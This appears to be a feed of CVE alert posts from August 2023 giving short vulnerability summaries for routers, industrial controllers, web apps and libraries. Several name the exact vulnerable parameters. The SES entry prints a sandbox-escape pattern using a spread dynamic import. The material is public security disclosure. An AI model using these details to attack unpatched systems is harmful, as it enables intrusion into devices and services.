| 2023-08-09 14:58:14 |
🚨 CVE-2023-2905Due to a failure in validating the length of a provided MQTT_CMD_PUBLISH parsed message with a variable length header, Cesanta Mongoose, an embeddable web server, version 7.10 is susceptible to a heap-based buffer overflow vulnerability in the default configuration. Version 7.9 and prior does not appear to be vulnerable. This issue is resolved in version 7.11.🎖@cveNotify |
|
| 2023-08-09 14:58:13 |
🚨 CVE-2023-26310There is a command injection problem in the old version of the mobile phone backup app.🎖@cveNotify |
|
| 2023-08-09 14:58:12 |
🚨 CVE-2023-37855In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges is able to gain limited read-access to the device-filesystem within the embedded Qt browser.🎖@cveNotify |
|
| 2023-08-09 13:58:20 |
🚨 CVE-2023-33365A path traversal vulnerability exists in Suprema BioStar 2 before 2.9.1, which allows unauthenticated attackers to fetch arbitrary files from the server's web server.🎖@cveNotify |
|
| 2023-08-09 13:58:19 |
🚨 CVE-2023-2760An SQL injection vulnerability exists in TapHome core HandleMessageUpdateDevicePropertiesRequest function before version 2023.2, allowing low privileged users to inject arbitrary SQL directives into an SQL query and execute arbitrary SQL commands and get full reading access. This may also lead to limited write access and temporary Denial-of-Service.🎖@cveNotify |
|
| 2023-08-09 13:58:15 |
🚨 CVE-2022-4224In multiple products of CODESYS v3 in multiple versions a remote low privileged user could utilize this vulnerability to read and modify system files and OS resources or DoS the device.🎖@cveNotify |
|
| 2023-08-09 13:58:14 |
🚨 CVE-2021-34600Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation.🎖@cveNotify |
|
| 2023-08-09 13:58:13 |
🚨 CVE-2023-23903An authenticated administrator can upload a SAML configuration file with the wrong format, with the application not checking the correct file format. Every subsequent application request will return an error.The whole application in rendered unusable until a console intervention.🎖@cveNotify |
|
| 2023-08-09 13:58:12 |
🚨 CVE-2023-24015A partial DoS vulnerability has been detected in the Reports section, exploitable by a malicious authenticated user forcing a report to be saved with its name set as null.The reports section will be partially unavailable for all later attempts to use it, with the report list seemingly stuck on loading.🎖@cveNotify |
|
| 2023-08-09 11:58:30 |
🚨 CVE-2018-17434A SIGFPE signal is raised in the function apply_filters() of h5repack_filters.c in the HDF HDF5 through 1.10.3 library during an attempted parse of a crafted HDF file, because of incorrect protection against division by zero. It could allow a remote denial of service attack.🎖@cveNotify |
|
| 2023-08-09 11:58:29 |
🚨 CVE-2018-17437Memory leak in the H5O_dtype_decode_helper() function in H5Odtype.c in the HDF HDF5 through 1.10.3 library allows attackers to cause a denial of service (memory consumption) via a crafted HDF5 file.🎖@cveNotify |
|
| 2023-08-09 11:58:28 |
🚨 CVE-2023-24477In certain conditions, depending on timing and the usage of the Chrome web browser, Guardian/CMC versions before 22.6.2 do not always completely invalidate the user session upon logout. Thus an authenticated local attacker may gain acces to the original user's session.🎖@cveNotify |
|
| 2023-08-09 11:58:24 |
🚨 CVE-2023-38208Adobe Commerce versions 2.4.6-p1 (and earlier), 2.4.5-p3 (and earlier) and 2.4.4-p4 (and earlier) are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an admin-privilege authenticated attacker. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-08-09 11:58:23 |
🚨 CVE-2022-47185Improper input validation vulnerability on the range header in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: through 9.2.1.🎖@cveNotify |
|
| 2023-08-09 11:58:22 |
🚨 CVE-2023-26310There is a command injection problem in the old version of the mobile phone backup app.🎖@cveNotify |
|
| 2023-08-09 11:58:19 |
🚨 CVE-2023-33934Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: through 9.2.1.🎖@cveNotify |
|
| 2023-08-09 11:58:18 |
🚨 CVE-2023-37856In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges is able to gain limited read-access to the device-filesystem through a configuration dialog within the embedded Qt browser .🎖@cveNotify |
|
| 2023-08-09 11:58:17 |
🚨 CVE-2023-37858In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 an authenticated, remote attacker with admin privileges is able to read hardcoded cryptographic keys allowing to decrypt an encrypted web application login password.🎖@cveNotify |
|
| 2023-08-09 11:58:13 |
🚨 CVE-2023-37861In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 an authenticated remote attacker can execute code with root permissions with a specially crafted HTTP POST when uploading a certificate to the device.🎖@cveNotify |
|
| 2023-08-09 11:58:12 |
🚨 CVE-2023-37863In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with SNMPv2 write privileges may use an a special SNMP request to gain full access to the device.🎖@cveNotify |
|
| 2023-08-09 05:58:18 |
🚨 CVE-2023-38752Improper authorization vulnerability in Special Interest Group Network for Analysis and Liaison versions 4.4.0 to 4.7.7 allows the authorized API users to view the attribute information of the poster that is set as"non-disclosure" in the system settings.🎖@cveNotify |
|
| 2023-08-09 05:58:14 |
🚨 CVE-2023-4243The FULL - Customer plugin for WordPress is vulnerable to Arbitrary File Upload via the /install-plugin REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to execute code by installing plugins from arbitrary remote locations including non-repository sources onto the site, granted they are packaged as a valid WordPress plugin.🎖@cveNotify |
|
| 2023-08-09 05:58:13 |
🚨 CVE-2023-4239The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.🎖@cveNotify |
|
| 2023-08-09 00:58:18 |
🚨 CVE-2023-39210Cleartext storage of sensitive information in Zoom Client SDK for Windows before 5.15.0 may allow an authenticated user to enable an information disclosure via local access.🎖@cveNotify |
|
| 2023-08-09 00:58:14 |
🚨 CVE-2023-39212Untrusted search path in Zoom Rooms for Windows before version 5.15.5 may allow an authenticated user to enable a denial of service via local access.🎖@cveNotify |
|
| 2023-08-09 00:58:13 |
🚨 CVE-2023-39214Exposure of sensitive information in Zoom Client SDK's before 5.15.5 may allow an authenticated user to enable a denial of service via network access.🎖@cveNotify |
|
| 2023-08-09 00:58:12 |
🚨 CVE-2023-39951OpenTelemetry Java Instrumentation provides OpenTelemetry auto-instrumentation and instrumentation libraries for Java. OpenTelemetry Java Instrumentation prior to version 1.28.0 contains an issue related to the instrumentation of Java applications using the AWS SDK v2 with Amazon Simple Email Service (SES) v1 API. When SES POST requests are instrumented, the query parameters of the request are inserted into the trace `url.path` field. This behavior leads to the http body, containing the email subject and message, to be present in the trace request url metadata. Any user using a version before 1.28.0 of OpenTelemetry Java Instrumentation to instrument AWS SDK v2 call to SES’s v1 SendEmail API is affected. The e-mail content sent to SES may end up in telemetry backend. This exposes the e-mail content to unintended audiences. The issue can be mitigated by updating OpenTelemetry Java Instrumentation to version 1.28.0 or later.🎖@cveNotify |
|
| 2023-08-08 22:58:25 |
🚨 CVE-2023-38494MeterSphere is an open-source continuous testing platform. Prior to version 2.10.4 LTS, some interfaces of the Cloud version of MeterSphere do not have configuration permissions, and are sensitively leaked by attackers. Version 2.10.4 LTS contains a patch for this issue.🎖@cveNotify |
|
| 2023-08-08 22:58:24 |
🚨 CVE-2023-38964Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-08-08 22:58:23 |
🚨 CVE-2010-1685Stack-based buffer overflow in CursorArts ZipWrangler 1.20 allows user-assisted remote attackers to execute arbitrary code via a ZIP file containing a file with a long filename.🎖@cveNotify |
|
| 2023-08-08 22:58:22 |
🚨 CVE-2023-33666ai-dev aioptimizedcombinations before v0.1.3 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.🎖@cveNotify |
|
| 2023-08-08 22:58:21 |
🚨 CVE-2023-0956External input could be used on TEL-STER TelWin SCADA WebInterface to construct paths to files and directories without properly neutralizing special elements within the pathname, which could allow an unauthenticated attacker to read files on the system.🎖@cveNotify |
|
| 2023-08-08 22:58:17 |
🚨 CVE-2023-39112ECShop v4.1.16 contains an arbitrary file deletion vulnerability in the Admin Panel.🎖@cveNotify |
|
| 2023-08-08 22:58:16 |
🚨 CVE-2023-39143PaperCut NG and PaperCut MF before 22.1.3 on Windows allow path traversal, enabling attackers to upload, read, or delete arbitrary files. This leads to remote code execution when external device integration is enabled (a very common configuration).🎖@cveNotify |
|
| 2023-08-08 22:58:15 |
🚨 CVE-2023-33372Connected IO v2.1.0 and prior uses a hard-coded username/password pair embedded in their device's firmware used for device communication using MQTT. An attacker who gained access to these credentials is able to connect to the MQTT broker and send messages on behalf of devices, impersonating them. in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.🎖@cveNotify |
|
| 2023-08-08 22:58:14 |
🚨 CVE-2023-33373Connected IO v2.1.0 and prior keeps passwords and credentials in clear-text format, allowing attackers to exfiltrate the credentials and use them to impersonate the devices.🎖@cveNotify |
|
| 2023-08-08 19:58:30 |
🚨 CVE-2023-3329SpiderControl SCADA Webserver versions 2.08 and prior are vulnerable to path traversal. An attacker with administrative privileges could overwrite files on the webserver using the HMI's upload file feature. This could create size zero files anywhere on the webserver, potentially overwriting system files and creating a denial-of-service condition.🎖@cveNotify |
|
| 2023-08-08 19:58:29 |
🚨 CVE-2023-39114ngiflib commit 84a75 was discovered to contain a segmentation violation via the function SDL_LoadAnimatedGif at ngiflibSDL.c. This vulnerability is triggered when running the program SDLaffgif.🎖@cveNotify |
|
| 2023-08-08 19:58:28 |
🚨 CVE-2023-39113ngiflib commit fb271 was discovered to contain a segmentation violation via the function "main" at gif2tag.c. This vulnerability is triggered when running the program gif2tga.🎖@cveNotify |
|
| 2023-08-08 19:58:25 |
🚨 CVE-2023-39551PHPGurukul Online Security Guards Hiring System v.1.0 is vulnerable to SQL Injection via osghs/admin/search.php.🎖@cveNotify |
|
| 2023-08-08 19:58:24 |
🚨 CVE-2023-1935ROC800-Series RTU devices are vulnerable to an authentication bypass, which could allow an attacker to gain unauthorized access to data or control of the device and cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-08-08 19:58:23 |
🚨 CVE-2023-39532SES is a JavaScript environment that allows safe execution of arbitrary programs in Compartments. In version 0.18.0 prior to 0.18.7, 0.17.0 prior to 0.17.1, 0.16.0 prior to 0.16.1, 0.15.0 prior to 0.15.24, 0.14.0 prior to 0.14.5, an 0.13.0 prior to 0.13.5, there is a hole in the confinement of guest applications under SES that may manifest as either the ability to exfiltrate information or execute arbitrary code depending on the configuration and implementation of the surrounding host.Guest program running inside a Compartment with as few as no endowments can gain access to the surrounding host’s dynamic import by using dynamic import after the spread operator, like `{...import(arbitraryModuleSpecifier)}`.On the web or in web extensions, a Content-Security-Policy following ordinary best practices likely mitigates both the risk of exfiltration and execution of arbitrary code, at least limiting the modules that the attacker can import to those that are already part of the application. However, without a Content-Security-Policy, dynamic import can be used to issue HTTP requests for either communication through the URL or for the execution of code reachable from that origin.Within an XS worker, an attacker can use the host’s module system to the extent that the host has been configured. This typically only allows access to module code on the host’s file system and is of limited use to an attacker.Within Node.js, the attacker gains access to Node.js’s module system. Importing the powerful builtins is not useful except insofar as there are side-effects and tempered because dynamic import returns a promise. Spreading a promise into an object renders the promises useless. However, Node.js allows importing data URLs, so this is a clear path to arbitrary execution.Versions 0.18.7, 0.17.1, 0.16.1, 0.15.24, 0.14.5, and 0.13.5 contain a patch for this issue. Some workarounds are available. On the web, providing a suitably constrained Content-Security-Policy mitigates most of the threat. With XS, building a binary that lacks the ability to load modules at runtime mitigates the entirety of the threat. That will look like an implementation of `fxFindModule` in a file like `xsPlatform.c` that calls `fxRejectModuleFile`.🎖@cveNotify |
|
| 2023-08-08 19:58:19 |
🚨 CVE-2023-3618A flaw was found in libtiff. A specially crafted tiff file can lead to a segmentation fault due to a buffer overflow in the Fax3Encode function in libtiff/tif_fax3.c, resulting in a denial of service.🎖@cveNotify |
|
| 2023-08-08 19:58:18 |
🚨 CVE-2023-3494The fwctl driver implements a state machine which is executed when a bhyve guest accesses certain x86 I/O ports. The interface lets the guest copy a string into a buffer resident in the bhyve process' memory. A bug in the state machine implementation can result in a buffer overflowing when copying this string. Malicious, privileged software running in a guest VM can exploit the buffer overflow to achieve code execution on the host in the bhyve userspace process, which typically runs as root, mitigated by the capabilities assigned through the Capsicum sandbox available to the bhyve process.🎖@cveNotify |
|
| 2023-08-08 19:58:17 |
🚨 CVE-2023-3718An authenticated command injection vulnerability exists in the AOS-CX command line interface. Successful exploitation of this vulnerability results in the ability to execute arbitrary commands on the underlying operating system as a privileged user on the affected switch. This allows an attacker to fully compromise the underlying operating system on the device running AOS-CX.🎖@cveNotify |
|
| 2023-08-08 19:58:14 |
🚨 CVE-2023-38758Cross Site Scripting vulnerability in wger Project wger Workout Manager v.2.2.0a3 allows a remote attacker to gain privileges via the license_author field in the add-ingredient function in the templates/ingredients/view.html, models/ingredients.py, and views/ingredients.py components.🎖@cveNotify |
|
| 2023-08-08 19:58:13 |
🚨 CVE-2023-38760SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the role and gender parameters within the /QueryView.php component.🎖@cveNotify |
|
| 2023-08-08 19:58:12 |
🚨 CVE-2023-38762SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the friendmonths parameter within the /QueryView.php.🎖@cveNotify |
|
| 2023-08-08 17:58:52 |
🚨 CVE-2023-37558After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37559🎖@cveNotify |
|
| 2023-08-08 17:58:51 |
🚨 CVE-2023-37551In multiple Codesys products in multiple versions, after successful authentication as a user, specially crafted network communication requests can utilize the CmpApp component to download files with any file extensions to the controller. In contrast to the regular file download via CmpFileTransfer, no filtering of certain file types is performed here. As a result, the integrity of the CODESYS control runtime system may be compromised by the files loaded onto the controller.🎖@cveNotify |
|
| 2023-08-08 17:58:50 |
🚨 CVE-2023-38330OXID eShop Enterprise Edition 6.5.0 – 6.5.2 before 6.5.3 allows uploading files with modified headers in the administration area. An attacker can upload a file with a modified header to create a HTTP Response Splitting attack.🎖@cveNotify |
|
| 2023-08-08 17:58:49 |
🚨 CVE-2023-24698Insufficient parameter validation in the Foswiki::Sandbox component of Foswiki v2.1.7 and below allows attackers to perform a directory traversal via supplying a crafted web request.🎖@cveNotify |
|
| 2023-08-08 17:58:45 |
🚨 CVE-2023-33756An issue in the SpreadSheetPlugin component of Foswiki v2.1.7 and below allows attackers to execute a directory traversal.🎖@cveNotify |
|
| 2023-08-08 17:58:44 |
🚨 CVE-2023-36136PHPJabbers Class Scheduling System 1.0 lacks encryption on the password when editing a user account (update user page) allowing an attacker to capture all user names and passwords in clear text.🎖@cveNotify |
|
| 2023-08-08 17:58:43 |
🚨 CVE-2023-3651Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Digital Ant E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: before 11.🎖@cveNotify |
|
| 2023-08-08 17:58:39 |
🚨 CVE-2023-3652Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital Ant E-Commerce Software allows Reflected XSS.This issue affects E-Commerce Software: before 11.🎖@cveNotify |
|
| 2023-08-08 17:58:38 |
🚨 CVE-2023-3653Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital Ant E-Commerce Software allows Stored XSS.This issue affects E-Commerce Software: before 11.🎖@cveNotify |
|
| 2023-08-08 17:58:37 |
🚨 CVE-2023-38958An access control issue in ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to arbitrarily close and open the doors managed by the platform remotely via sending a crafted web request.🎖@cveNotify |
|
| 2023-08-08 17:58:36 |
🚨 CVE-2023-37497The Unica application exposes an API which accepts arbitrary XML input. By manipulating the given XML, an authenticated attacker with certain rights can successfully perform XML External Entity attacks (XXE) against the backend service.🎖@cveNotify |
|
| 2023-08-08 17:58:32 |
🚨 CVE-2023-34196In the Keyfactor EJBCA before 8.0.0, the RA web certificate distribution servlet /ejbca/ra/cert allows partial denial of service due to an authentication issue. In configurations using OAuth, disclosure of CA certificates (attributes and public keys) to unauthenticated or less privileged users may occur.🎖@cveNotify |
|
| 2023-08-08 17:58:31 |
🚨 CVE-2023-4132A use-after-free vulnerability was found in the siano smsusb module in the Linux kernel. The bug occurs during device initialization when the siano device is plugged in. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2023-08-08 17:58:30 |
🚨 CVE-2023-4133A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2023-08-08 10:58:27 |
🚨 CVE-2023-37569This vulnerability exists in ESDS Emagic Data Center Management Suit due to lack of input sanitization in its Ping component. A remote authenticated attacker could exploit this by injecting OS commands on the targeted system.Successful exploitation of this vulnerability could allow the attacker to execute arbitrary code on targeted system.🎖@cveNotify |
|
| 2023-08-08 10:58:26 |
🚨 CVE-2023-37570This vulnerability exists in ESDS Emagic Data Center Management Suit due to non-expiry of session cookie. By reusing the stolen cookie, a remote attacker could gain unauthorized access to the targeted system.🎖@cveNotify |
|
| 2023-08-08 10:58:25 |
🚨 CVE-2023-3898Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in mAyaNet E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: before 1.1.🎖@cveNotify |
|
| 2023-08-08 10:58:23 |
🚨 CVE-2023-4009In MongoDB Ops Manager v5.0 prior to 5.0.22 and v6.0 prior to 6.0.17 it is possible for an authenticated user with project owner or project user admin access to generate an API key with the privileges of org owner resulting in privilege escalation.🎖@cveNotify |
|
| 2023-08-08 10:58:22 |
🚨 CVE-2023-2329The WooCommerce Google Sheet Connector WordPress plugin before 1.3.6 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack🎖@cveNotify |
|
| 2023-08-08 10:58:21 |
🚨 CVE-2023-3526In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an unauthenticated remote attacker could use a reflective XSS within the license viewer page of the devices in order to execute code in the context of the user's browser.🎖@cveNotify |
|
| 2023-08-08 10:58:20 |
🚨 CVE-2023-3569In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an authenticated remote attacker with admin privileges could upload a crafted XML file which causes a denial-of-service.🎖@cveNotify |
|
| 2023-08-08 10:58:19 |
🚨 CVE-2023-3570In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use a specific HTTP DELETE request to gain full access to the device.🎖@cveNotify |
|
| 2023-08-08 10:58:18 |
🚨 CVE-2023-3571In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use a specific HTTP POST releated to certificate operations to gain full access to the device.🎖@cveNotify |
|
| 2023-08-08 10:58:17 |
🚨 CVE-2023-3572In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use an attribute of a specific HTTP POST request releated to date/time operations to gain full access to the device.🎖@cveNotify |
|
| 2023-08-08 10:58:16 |
🚨 CVE-2023-3573In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use a command injection in a HTTP POST request releated to font configuration operations to gain full access to the device.🎖@cveNotify |
|
| 2023-08-08 10:58:15 |
🚨 CVE-2023-39976log_blackbox.c in libqb before 2.0.8 allows a buffer overflow via long log messages because the header size is not considered.🎖@cveNotify |
|
| 2023-08-08 10:58:14 |
🚨 CVE-2023-39977An issue was discovered in the Linux kernel before 6.3.2. There is an out-of-bounds access in relay_file_read in kernel/relay.c.🎖@cveNotify |
|
| 2023-08-08 10:58:12 |
🚨 CVE-2023-39978ImageMagick before 6.9.12-91 allows attackers to cause a denial of service (memory consumption) in Magick::Draw.🎖@cveNotify |
|
| 2023-08-08 01:58:14 |
🚨 CVE-2023-34624An issue was discovered htmlcleaner thru = 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-08-08 01:58:13 |
🚨 CVE-2023-32302Silverstripe Framework is the MVC framework that powers Silverstripe CMS. When a new member record is created and a password is not set, an empty encrypted password is generated. As a result, if someone is aware of the existence of a member record associated with a specific email address, they can potentially attempt to log in using that empty password. Although the default member authenticator and login form require a non-empty password, alternative authentication methods might still permit a successful login with the empty password. This issue has been patched in versions 4.13.4 and 5.0.13.🎖@cveNotify |
|
| 2023-08-07 23:58:30 |
🚨 CVE-2023-39525PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, in the back office, files can be compromised using path traversal by replaying the import file deletion query with a specified file path that uses the traversal path. Version 8.1.1 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-07 23:58:26 |
🚨 CVE-2023-39527PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to cross-site scripting through the `isCleanHTML` method. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-07 23:58:25 |
🚨 CVE-2023-39529PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, it is possible to delete a file from the server by using the Attachments controller and the Attachments API. Version 8.1.1 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-07 23:58:24 |
🚨 CVE-2023-39530PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, it is possible to delete files from the server via the CustomerMessage API. Version 8.1.1 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-07 23:58:20 |
🚨 CVE-2023-38955ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to obtain sensitive information about all managed devices, including their IP addresses and device names.🎖@cveNotify |
|
| 2023-08-07 23:58:19 |
🚨 CVE-2023-39524PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, SQL injection possible in the product search field, in BO's product page. Version 8.1.1 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-08-07 23:58:14 |
🚨 CVE-2023-38954ZKTeco BioAccess IVS v3.3.1 was discovered to contain a SQL injection vulnerability.🎖@cveNotify |
|
| 2023-08-07 23:58:13 |
🚨 CVE-2023-36494Audit logs on F5OS-A may contain undisclosed sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-08-07 20:58:30 |
🚨 CVE-2023-38412Netgear R6900P v1.3.3.154 was discovered to contain multiple buffer overflows via the wla_ssid and wlg_ssid parameters at ia_ap_setting.cgi.🎖@cveNotify |
|
| 2023-08-07 20:58:29 |
🚨 CVE-2023-38921Netgear WG302v2 v5.2.9 and WAG302v2 v5.1.19 were discovered to contain multiple command injection vulnerabilities in the upgrade_handler function via the firmwareRestore and firmwareServerip parameters.🎖@cveNotify |
|
| 2023-08-07 20:58:28 |
🚨 CVE-2023-38924Netgear DGN3500 1.1.00.37 was discovered to contain a buffer overflow via the http_password parameter at setup.cgi.🎖@cveNotify |
|
| 2023-08-07 20:58:24 |
🚨 CVE-2023-38926Netgear EX6200 v1.0.3.94 was discovered to contain a buffer overflow via the wla_temp_ssid parameter at acosNvramConfig_set.🎖@cveNotify |
|
| 2023-08-07 20:58:23 |
🚨 CVE-2023-38930Tenda AC7 V1.0,V15.03.06.44, F1203 V2.0.1.6, AC5 V1.0,V15.03.06.28, AC9 V3.0,V15.03.06.42_multi and FH1205 V2.0.0.7(775) were discovered to contain a stack overflow via the deviceId parameter in the addWifiMacFilter function.🎖@cveNotify |
|
| 2023-08-07 20:58:19 |
🚨 CVE-2023-38932Tenda F1202 V1.2.0.9, PA202 V1.1.2.5, PW201A V1.1.2.5 and FH1202 V1.2.0.9 were discovered to contain a stack overflow via the page parameter in the SafeEmailFilter function.🎖@cveNotify |
|
| 2023-08-07 20:58:18 |
🚨 CVE-2023-38934Tenda F1203 V2.0.1.6, FH1203 V2.0.1.6 and FH1205 V2.0.0.7(775) was discovered to contain a stack overflow via the deviceId parameter in the formSetDeviceName function.🎖@cveNotify |
|
| 2023-08-07 20:58:17 |
🚨 CVE-2023-38935Tenda AC1206 V15.03.06.23, AC8 V4 V16.03.34.06, AC5 V1.0 V15.03.06.28, AC10 v4.0 V16.03.10.13 and AC9 V3.0 V15.03.06.42_multi were discovered to contain a tack overflow via the list parameter in the formSetQosBand function.🎖@cveNotify |
|
| 2023-08-07 20:58:14 |
🚨 CVE-2023-38936Tenda AC10 V1.0 V15.03.06.23, AC1206 V15.03.06.23, AC6 V2.0 V15.03.06.23, AC7 V1.0 V15.03.06.44, AC5 V1.0 V15.03.06.28, FH1203 V2.0.1.6, AC9 V3.0 V15.03.06.42_multi and FH1205 V2.0.0.7(775) were discovered to contain a stack overflow via the speed_dir parameter in the formSetSpeedWan function.🎖@cveNotify |
|
| 2023-08-07 20:58:13 |
🚨 CVE-2023-38938Tenda F1202 V1.2.0.9, PA202 V1.1.2.5, PW201A V1.1.2.5 and FH1202 V1.2.0.9 were discovered to contain a stack overflow via the page parameter at /L7Im.🎖@cveNotify |
|
| 2023-08-07 20:58:12 |
🚨 CVE-2023-38940Tenda F1203 V2.0.1.6, FH1203 V2.0.1.6 and FH1205 V2.0.0.7(775) were discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.🎖@cveNotify |
|
| 2023-08-07 15:58:38 |
🚨 CVE-2023-0425ABB is aware of vulnerabilities in the product versions listed below. An update is available that resolvesthe reported vulnerabilities in the product versions under maintenance.An attacker who successfully exploited one or more of these vulnerabilities could cause the product tostop or make the product inaccessible. Numeric Range Comparison Without Minimum Check vulnerability in ABB Freelance controllers AC 700F (Controller modules), ABB Freelance controllers AC 900F (controller modules).This issue affects:Freelance controllers AC 700F: from 9.0;0 through V9.2 SP2, through Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019, through Freelance 2019 SP1, through Freelance 2019 SP1 FP1; Freelance controllers AC 900F: Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019, through Freelance 2019 SP1, through Freelance 2019 SP1 FP1.🎖@cveNotify |
|
| 2023-08-07 15:58:37 |
🚨 CVE-2023-0426ABB is aware of vulnerabilities in the product versions listed below. An update is available that resolvesthe reported vulnerabilities in the product versions under maintenance.An attacker who successfully exploited one or more of these vulnerabilities could cause the product tostop or make the product inaccessible. Stack-based Buffer Overflow vulnerability in ABB Freelance controllers AC 700F (conroller modules), ABB Freelance controllers AC 900F (controller modules).This issue affects: Freelance controllers AC 700F: from 9.0;0 through V9.2 SP2, through Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019 , through Freelance 2019 SP1, through Freelance 2019 SP1 FP1; Freelance controllers AC 900F: through Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019, through Freelance 2019 SP1, through Freelance 2019 SP1 FP1.🎖@cveNotify |
|
| 2023-08-07 15:58:36 |
🚨 CVE-2023-4192A vulnerability, which was classified as critical, was found in SourceCodester Resort Reservation System 1.0. This affects an unknown part of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236235.🎖@cveNotify |
|
| 2023-08-07 15:58:35 |
🚨 CVE-2023-4193A vulnerability has been found in SourceCodester Resort Reservation System 1.0 and classified as critical. This vulnerability affects unknown code of the file view_fee.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-236236.🎖@cveNotify |
|
| 2023-08-07 15:58:33 |
🚨 CVE-2022-47350In camera driver, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2023-08-07 15:58:32 |
🚨 CVE-2022-47351In camera driver, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2023-08-07 15:58:31 |
🚨 CVE-2023-33906In Contacts Service, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:30 |
🚨 CVE-2023-33907In Contacts Service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:29 |
🚨 CVE-2023-33908In ims service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:28 |
🚨 CVE-2023-33909In Contacts service, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:24 |
🚨 CVE-2023-33910In Contacts Service, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:23 |
🚨 CVE-2023-33911In vowifi service, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:22 |
